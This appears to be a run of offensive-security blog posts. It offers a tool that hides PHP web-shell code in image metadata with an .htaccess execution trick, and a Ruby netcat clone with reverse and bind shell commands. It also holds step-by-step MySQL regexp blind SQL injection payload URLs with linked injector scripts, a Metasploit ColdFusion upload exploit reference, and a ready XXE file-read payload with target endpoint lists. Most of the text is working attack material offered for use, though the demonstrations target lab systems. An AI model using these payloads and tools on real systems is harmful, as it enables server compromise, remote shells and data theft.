Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com3tag:blogger.com,1999:blog-8671806905307905831.post-23497175606734010082013-10-07T11:04:00.002-05:002013-10-07T11:04:51.123-05:00OhNo - The Evil Image Builder & Meta ManipulatorToday I would like to share a little something I made for fun. I previously made a posting on how to bypass general client side checks for uploading shells through open or administrative panels <a href="http://kaoticcreations.blogspot.com/2011/11/how-to-upload-shell.html" target="_blank">here</a>, well my buddy decided to one up me with a even better posting which you can read here: <a href="http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html">http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html</a>. In his write-up he talks about embedding PHP code within image tags to bypass weak server side checks which might be only using getimagesize() to verify it is a real image. In cases where this is beatable and there is no or minimal filename re-writing you can get creative as he outlines in his posting to get a shell. This method can also be very highly effective in exploiting include() type vulnerabilities with evil avatars as well! Anyways, he demonstrated things using a tool on Windows so I did some quick looking to see if I could replicate the functionalityt in Ruby, turns out you can :)<br />
<br />
<a href="https://github.com/janfri/mini_exiftool" target="_blank">Mini_Exiftool</a> to the rescue! As they describe it on their Github page "This library is a wrapper for the Exiftool command-line application (<a href="http://www.sno.phy.queensu.ca/~phil/exiftool/">http://www.sno.phy.queensu.ca/~phil/exiftool/</a>) written by Phil Harvey. You will get the full power of Exiftool to Ruby: Reading and writing of EXIF-data, IPTC-data and XMP-data." If you don't know anything about metatags, EXIF data or what I've been talking about then go check out the Exiftool site to read a bit more about it and how it works as it will help you understand whats going on under the hood. <br />
<br />
For quick summary and the lazy, this tool can be used to read and dump the meta tags and meta values off of the files as well as remove and re-write the tag values in many cases. What all is in there? All kinds of random data can be found in the meta data, from manufacturer information from the device which took the picture or recording, to latitude and longitude of where a photo was taken, to who originally authored a document and when, contact info and emails even. There is a great amazing wealth of information available sometimes if you just look! <br />
<br />
In our case we will be taking advantage of all that spare space as r0ng demonstrated to store (evil) PHP code in image files. I made a simple tool to leveraging the Mini_Exiftool gem to automate the process and make it a bit easier for the average user and because i felt like also making a small GUI for things (more fun with Tk bindings). You can find most of the Mini-Exiftool functionality covered in their <a href="https://github.com/janfri/mini_exiftool/blob/master/Tutorial.rdoc" target="_blank">tutorial</a>, so I won't go over too much as I mostly just linked small functions shown there to fit the command line options parsed by optparse, not too much magic here. You can set options as arguments and run how you like or run in a GUI mode and do it all from there. <br />
<br />
Help Menu:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/hZl8XPV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/hZl8XPV.png" width="340" /></a></div>
<br />
Dump All Tags and associated Tag Values for file:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/HhBmPCp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/HhBmPCp.png" width="340" /></a></div>
<br />
Write to Tag (it will try to create if it doesn't exist):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RFYQ0HL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/RFYQ0HL.png" width="400" /></a></div>
<br />
<br />
Dump after to confirm file write:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/kthkvhk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i.imgur.com/kthkvhk.png" width="400" /></a></div>
<br />
<br />
If you set the value to nothing and write it will remove the tag (& value):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/gCAc5ED.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i.imgur.com/gCAc5ED.png" width="400" /></a></div>
<br />
Dump after to confirm:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ds1aB0Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/ds1aB0Q.png" width="303" /></a></div>
<br />
<br />
I also created a nuke (-n) option which simply automates the above null write process to remove the tag. The Exiftool CLI and even the gem have more functionality to adjust timestamps and more subtle details, i kept it simple for now so mostly just string values for tags which are writable and hold string values. As a general rule of thumb the 'Comment' tag is almost always writable and/or can be created and written to. Perhaps in the future I will try to further extend to allow such functionality but for now it does what it needs to, embed PHP Shell code in images ;)<br />
<br />
Embedding r0ng Shell from CLI:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/cZR3wR1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="http://i.imgur.com/cZR3wR1.png" width="400" /></a></div>
<br />
<br />
Hex Dump to Confirm:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/hXIeMLW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="http://i.imgur.com/hXIeMLW.png" width="400" /></a></div>
<br />
Bypass Uploader restrictions or new .htaccess (AddType application/x-httpd-php .png) as described in previous write-ups and then execute your shell in Browser:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/LeFlFol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i.imgur.com/LeFlFol.png" width="400" /></a></div>
<br />
<br />
I added a -u option which will help quickly build all possible upload filenames. I know i often tend to forget one or two when I do it 100% manually so this just helps me build a folder so I can then run through them all in hopes one will sneak past weak filters and checks.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/VkYn6db.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/VkYn6db.png" width="400" /></a></div>
<br />
Launch in GUI mode:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mQpqg10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/mQpqg10.png" width="400" /></a></div>
<br />
<br />
Embedding Sneaky Shell from GUI:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/iajWLnh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/iajWLnh.png" width="400" /></a></div>
<br />
<br />
I only tested it with image files as that was my main target but i do believe you should be able to also use the general viewing, deleting and writing with any file Exiftool would support (i.e. PDF, Word, Excel, etc). The <a href="http://www.digininja.org/projects/cewl.php" target="_blank">CeWL</a> password list generator tool is another Ruby project which leverages Meta data to help profile corporate targets for password auditing purposes, read more about that project <a href="http://www.digininja.org/projects/cewl.php" target="_blank">here</a>. Please let me know how things work for you and how else this might be useful to you so I can try to improve as time allows.<br />
<br />
<b>DOWNLOAD:</b> Zip File w/Gemfile, Both Source Files, and a few Sample Images: <a href="http://uppit.com/l2r0chwr6q4t/OhNo.zip" target="_blank">DOWNLOAD</a><br />
<br />
<u><b>Getting things working:</b></u><br />
Ruby TK Bindings Needed for GUI Support:<br />
<b>COMMAND:</b> apt-get install tk libtk-ruby<br />
<br />
If require 'tkextlib/tile' throws in `require': TkPackage can't find package tile (RuntimeError)<br />
<b>COMMANDS:</b> teacup install tile<br />
<br />
ExifTool CLI Installation: <a href="http://www.sno.phy.queensu.ca/~phil/exiftool/install.html">http://www.sno.phy.queensu.ca/~phil/exiftool/install.html</a><br />
<ul>
<li>Download file, run commands:</li>
<li>cd <your download directory></li>
<li>gzip -dc Image-ExifTool-#.##.tar.gz | tar -xf -</li>
<li>cd Image-ExifTool-#.##/</li>
<li>perl Makefile.PL</li>
<li>make test</li>
<li>sudo make install</li>
</ul>
Once pre-requisites above are met:<br />
<b>COMMANDS: </b><br />
<ul>
<li>wget http://uppit.com/l2r0chwr6q4t/OhNo.zip</li>
<li>unzip OhNo.zip</li>
<li>cd OhNo/</li>
<li>bundle install</li>
<li>./ohno -h</li>
</ul>
<br />
Source Code for Full All in One, also outlined below (CLI & GUI): <a href="http://pastebin.com/yi7YKmPz" target="_blank">SOURCE</a><br />
<br />
Source Code for Standalone CLI Version (NO GUI): <a href="http://pastebin.com/fmYxj1aH" target="_blank">SOURCE</a><br />
<br />
Raw All in One Code:<br />
<script src="http://pastebin.com/embed_js.php?i=yi7YKmPz"></script>
<br />
Hope this is helpful to someone out there....<br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com11tag:blogger.com,1999:blog-8671806905307905831.post-43475962165124377662013-10-04T21:14:00.001-05:002013-10-04T21:14:24.301-05:00RubyCat - A Pure Ruby NetCat AlternativeIt's been a while and one of the last things I posted was about me off having fun with learning Ruby, so I thought I might share one of the more useful pieces of code I was able to come up with. I mashed up my reverse shell, my bind shell, and simple sockets connector and listener and came up with a simple to use script to simulate most of the basic or common tasks one might use Netcat for. As you know Netcat is often limited, flagged, or compiled without the -e GAPING_SECURITY_HOLE enabled which can make life hard on us as testers. This is one more thing you can add to the old bag of tricks to wiggle out of such situations if Ruby is available to you. It uses all standard libs so should work on any system with relatively recent ruby version installed, although I honestly have not widely tested it out yet so perhaps you can share your feedback with me to help improve a little. Some quick examples to highlight basic usage....<br />
<br />
Open a listener on local machine using port 31337 and catch a reverse shell from somewhere:<br />
<b>COMMAND: </b>./rubycat.rb -l -p 31337<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/cdtKLJz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/cdtKLJz.jpg" width="400" /></a></div>
<br />
Connect to a Bind Shell you have waiting somewhere else:<br />
<b>COMMAND: </b> ./rubycat.rb -c -i 127.0.0.1 -p 5151<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ymIg8b4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/ymIg8b4.jpg" width="400" /></a></div>
<br />
Launch a Bind Command Shell on localhost on port 31337 with password (default password is 'knock-knock'):<br />
<b>COMMAND: </b>./rubycat.rb -b -p 31337 -P s3cr3tp@ss<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/qFsNenL.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/qFsNenL.jpg" width="400" /></a></div>
<br />
<b>NOTE: </b>If you enter the wrong pass, it will print funny message then go silent. You have to re-connect to try and login again.<br />
<br />
Launch a Command Reverse Shell to provided IP and Port:<br />
<b>COMMAND:</b> ./rubycat.rb -r -i 127.0.0.1 -p 31337<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6rg4IH4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/6rg4IH4.jpg" width="400" /></a></div>
<br />
The 328 lines of Ruby which make it all possible: <a href="http://pastebin.com/Z7eFKFDm" target="_blank">LINK</a><br />
<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=Z7eFKFDm"></script>
Hope this is useful to someone out there....<br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-16175640337393184032013-10-04T12:52:00.000-05:002013-10-04T12:52:00.612-05:00MySQL Regexp Conditional Errors & Faster Blind InjectionsToday I am going to share a SQL injection method which was new to me, using Regexp conditional errors for speeding up blind injections. Some might call it error based, I will stick to calling it blind myself - you can decide after you read. I will focus on MySQL today, but it is also very similar in MS-SQL with RLIKE so you should be able to connect the dots without too much troubles. I did not invent this or discover it, but I did automate it in Ruby and thought I would share a bit to help highlight it a bit more in hopes others will pick up on it. I have asked and looked around and it doesn't seem to be widely known or covered topic so I thought it would make for a decent blog write up...<br />
<br />
<br />
Some quick background and helpful links which may give some better insights or get your mind going on how else you can toy with injections and Regexp after reading this article:<br />
<ul>
<li>Original Write-Up on this subject which influenced me:</li>
<ul>
<li>Speeding up Blind SQL Injections using Conditional Errors in MySQL (for which this is a repeat of and my code based on): <a href="http://ha.xxor.se/2011/06/speeding-up-blind-sql-injections-using.html" target="_blank">LINK</a> </li>
</ul>
<li>Apparently, this is the original writeup on the topic (in Russian), which lead to the above posting being done: <a href="http://qwazar.ru/?p=26" target="_blank">LINK</a> </li>
<li>Other helpful links in understanding uses of Regexp and RLIKE:</li>
<ul>
<li>Blind Sql Injection with Regular Expressions Attack, by IHTeam: <a href="http://packetstorm.foofus.com/papers/database/blind-sqli-regexp-attack.pdf" target="_blank">LINK</a> </li>
<li>REGEXP based SQL INJECTION attacks by nullbyt3: <a href="http://securityoverride.org/articles.php?article_id=116" target="_blank">LINK</a></li>
</ul>
</ul>
<br />
Available Error Messages from the various Regexp conditions it can encounter while performing pattern matching:<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=6JKQ1cNS"></script>
As you can see there is a lot available to work with. I highly recommend checking out all of the above links, especially the first one if you have any time at all as it will likely explain things better than I can. Long story short, we can use Regexp to control MySQL error messages based on the query provided in addition to be able to use it for pattern matching. How is this helpful though? Well in a typical boolean based blind injection you have to play twenty questions to extract your results. This often results in a very high number of requests, which in turn can be very loud & time consuming. If you have the ability to generate verbose error messages on a page then we can likely use Regexp to tweak our normal attack method. Now Regexp actually has 10 possible error messages as noted above, and we will use this to our advantage in our attack. Most importantly, this means we can actually ask 10 questions with each query we send if we structure things right! Can you see the potential time savings yet? Let's continue and help clarify more...<br />
<br />
<u>How to test if Regexp Conditional Error Method can be used?</u><br />
<b>Get it to throw an error of course! </b><br />We can mirror the approach one would normally take with a boolean type injection to test if 1=1, however in this case on a true statement the regexp statement evaluates to true and thus returns 1, making our 1=1 query true. In the false case it results in a malformed regexp string being returned which is what actually generates the verbose error messages.<br />
<br />
Quick illustration through simple walk-through. First we find your typical SQL Error message as we are walking a site... <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/O9hdJFs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://i.imgur.com/O9hdJFs.png" width="320" /></a></div>
<br />
Now for our purposes we test a true statement embedded in a regexp statement, should not cause any errors and should return normal page results as it will evaluate to true within, returning value of 1 making regexp true, making our 1=1 a true statement:<br /><b> </b><br />
<b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF(1=1,1,''))-- -<br />
<b>ERROR MSG: </b>None<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/T30c0Nx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/T30c0Nx.png" width="400" /></a></div>
<br />
<b>NOTE: </b>You could use something like 'SELECT 1 REGEXP 1' to bypass simple filters which check for some default boolean injection tests like 'and 1=1'<br /><br />Now we tweak our test injection to embed a false statement within our regexp and check for the regexp error response which should be triggered as a result of the 1=2 returning false which in turn returns '' back to the regexp which interprets as an unacceptable format due to it being empty expression to match.<br />
<br /><b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF(1=2,1,''))-- -<br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Yfg5xGZ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/Yfg5xGZ.png" width="400" /></a></div>
<br />
If you get a regexp error message, like the image above, in your response then you should be able to use this method, if not then you will need to resort to an alternative approach using some other means (union, error based, boolean, time, get creative idk). Assuming the coast is clear let's continue injection to show how it works...<br /><br />Now, similar to boolean injection it is very wise to check the length of results data before trying to extract. You can play with the return value so error is thrown if it exists or not it is up to you, in this example error is thrown on false statements only. If the value is NULL or empty this will throw an error, otherwise it will return true and normal page results displayed. <br />
<br /><b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF((select length( (SELECT version()) )>0),1,''))-- - <br />
<b>ERROR MSG: </b>?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/om4e2k2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/om4e2k2.png" width="400" /></a></div>
<br />
<br />
We increment our length comparison value and see the error appear:<br /><b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF((select length( (SELECT version()) )>10),1,''))-- - <br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/yLMAGlo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/yLMAGlo.png" width="400" /></a></div>
<br />
You can change our query to ask if it actually is the length by changing our comparison operator to equals. We know its between 0 and 10 in this case, so we simply walk from 0 to 10 and when we do not see an error it will let us know this is the correct value for our result length (the version in this case).<br />
<br />
<b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF( ( select length( ( SELECT version() ) )=5 ) ,1,'' ) )-- -<br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/azasx7y.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/azasx7y.png" width="400" /></a></div>
<br />
<b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF( ( select length( ( SELECT version() ) )=6 ) ,1,'' ) )-- -<br />
<b>ERROR MSG: </b>w00t => No Error<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/h4QmQ8M.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/h4QmQ8M.png" width="400" /></a></div>
<br />
<br />
If we keep going we will see the errors come back again....<b> </b><br />
<b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF( ( select length( ( SELECT version() ) )=7 ) ,1,'' ) )-- -<br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/H9ax5cV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/H9ax5cV.png" width="400" /></a></div>
<br />
As you see above, we get no error when length is 6, so we know the length of our version() result output is 6 characters in length. Knowing this we can now safely go after the actual result itself. This is where this methods true time savings come into play as well. In boolean injection we are typically restricted to sending query to check one char value which leads to it being so time consuming. Here we will leverage all 10 possible error messages to guess our char value in ranges and then once the range is known we will use 10 guesses at a time until we find it. Given standard 256 ascii charset we can typically guess any char value in 4 requests or less, compared to 10x that in traditional boolean method. Knowing the length is 6, let's know find the full value for the first char so you see how it works to extract...<br />
<br />
<b>EXAMPLE: </b><br />http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' aNd 1=(SELECT 1 REGEXP <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<31,'', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<52,'(', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<73,'[', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<94,'\\\\',<br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<115,'*', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<136,'a{1,1,1}', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<157,'[a-9]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<178,'a{1', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<199,'[[.ab.]]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<230,'[[:ab:]]',1)))))))))))-- - <br /><br /><b>URLENCODED:</b><br />http://192.168.2.43/sqli-labs/Less-5/index.php?id=1'+aNd+1%3D%28SELECT+1+REGEXP+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C31%2C%27%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C52%2C%27%28%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C73%2C%27%5B%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C94%2C%27%5C%5C%5C%5C%27%2CIF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C115%2C%27%2A%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C136%2C%27a%7B1%2C1%2C1%7D%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C157%2C%27%5Ba-9%5D%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C178%2C%27a%7B1%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C199%2C%27%5B%5B.ab.%5D%5D%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C230%2C%27%5B%5B%3Aab%3A%5D%5D%27%2C1%29%29%29%29%29%29%29%29%29%29%29--+-<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xl3k5JT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://i.imgur.com/xl3k5JT.png" width="400" /></a></div>
<br />
As you can see in the image above, the above query raises the "Got error 'brackets ([ ]) not balanced' from regexp" error message, aligning with our third IF statement. The first false statement triggered is the winner to the error message throwing party so we use this to determine our ranges. This means that the ascii char value for the first character of our version() result value is in the ascii range of 52-72. Ok, so now we have only 20 possibilities to enumerate in this case. In traditional boolean this may take 10-20 requests, but we only need 2! Depending on where you land or how you break up the ranges in your automated code some may be covered in 2 requests while others need 4 to cover the full target range. Here we go again with examples...<br />
<b><br /></b>
<b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' aNd 1=(SELECT 1 REGEXP <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=51,'', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=52,'(', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=53,'[', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=54,'\\\\',<br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=55,'*', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=56,'a{1,1,1}', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=57,'[a-9]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=58,'a{1', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=59,'[[.ab.]]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=60,'[[:ab:]]',1)))))))))))-- - <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/83WmGjb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://i.imgur.com/83WmGjb.png" width="400" /></a></div>
<br />
<br />Now in this case we get the error thrown on the first request indicating our target char value (would be 3 minimum on a good day using boolean)! In this case we receive the same error message from Regexp which indicates our ascii char value is 53 or after conversion '5'. We know MySQL >= 5 now. We can simply increment the character position within our substring() and get the rest of the values for the full version string. Should we have not received an error on our first request we would have simply incremented our comparison values by 10 to scan the next possible ascii range, 61-70 in this particular case until we threw an error indicating the target value. <br /><br />Now this method can be applied to pretty much any query you can think of as long as you play nicely with general SQL Syntax and rules. I wrote a simple script to handle boolean blind and then I wrote a separate script to leverage this method. I then did some quick time comparisons to further highlight the time savings involved. In these simple examples I was running the database and vulnerable site on a separate machine via VM which was located on same network. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/J9qttIj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://i.imgur.com/J9qttIj.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/oz1dbm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://i.imgur.com/oz1dbm2.png" width="400" /></a></div>
<br />
Your times may vary with network conditions, but the time savings of Regexp vs traditional Boolean should be seen regardless of those variables!<br />
<br />
Hopefully this brings more people to be aware of this really cool method. Perhaps later I will cover some other ways it can be used in union injections and for fuzzing of tables, databases, readable files, etc. I have provided some proof of concept code so you can test this at home at your leisure to better understand and see how awesome it is. I included some easy to use proxy options as well so if your like me and like to see how it works then I highly encourage you to try that route, it really helps to understand better things if your still scratching your head!<br />
<br />
MySQL Regexp Conditional Error Based Injector Source: <a href="http://pastebin.com/5qAw6KAW" target="_blank">LINK</a><br />MySQL Boolean Based Injector Source: <a href="http://pastebin.com/85mzgBdG" target="_blank">LINK</a><br />
<br />
Both need the 'colorize' & 'curb' gem to work<br /><b>COMMAND:</b> gem install colorize curb<br /><br />The above should do the trick on most systems, then the usual chmod +x is needed. Hope this is helpful to someone out there. Please don't hesitate to let me know if you have problems running either script....<br /><br />Until next time, enjoy!<br />
<br />
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-77967752516648560772013-02-26T23:34:00.000-06:002013-02-26T23:34:05.949-06:00Ruby Rox!I'm having fun learning Ruby these days, hope to have some more stuff up soon. Maybe some horrible advice on coding in Ruby, maybe some more sploits. Promise to bring some interesting fun back soon.....stay tuned!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com2tag:blogger.com,1999:blog-8671806905307905831.post-59963493109555299162012-11-29T11:24:00.000-06:002012-11-29T11:24:09.126-06:00Hacking Cold Fusion Servers - Part IINow I will go over two more additional vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming your all set, let's begin....<br /><br />Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't due proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically shoot and point with MSF and hope for the best. If the uploader is present it will try to send a multi-part upload request via POST. If successful you should be able to find a shell in '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself so not going to post my code just yet, would like to confirm it first. You have MSF as a crutch for now, can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part.....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/fOVGz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/fOVGz.png" width="316" /></a></div>
<br />
OK, so in addition to the previously shown LFD/LFI to RCE vulneranility we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:<br />
<ul>
<li>/flex2gateway/</li>
<li>/flex2gateway/http</li>
<li>/flex2gateway/httpsecure</li>
<li>/flex2gateway/cfamfpolling</li>
<li>/flex2gateway/amf</li>
<li>/flex2gateway/amfpolling</li>
<li>/messagebroker/http</li>
<li>/messagebroker/httpsecure</li>
<li>/blazeds/messagebroker/http</li>
<li>/blazeds/messagebroker/httpsecure</li>
<li>/samples/messagebroker/http</li>
<li>/samples/messagebroker/httpsecure</li>
<li>/lcds/messagebroker/http</li>
<li>/lcds/messagebroker/httpsecure</li>
<li>/lcds-samples/messagebroker/http</li>
<li>/lcds-samples/messagebroker/httpsecure</li>
</ul>
You can accomplish this with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service:<br />
<blockquote class="tr_bq">
"<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!<b>ENTITY x3 </b>SYSTEM "<b><INSERT_PATH/FILE_HERE></b>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string><b>&x3</b>;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"</blockquote>
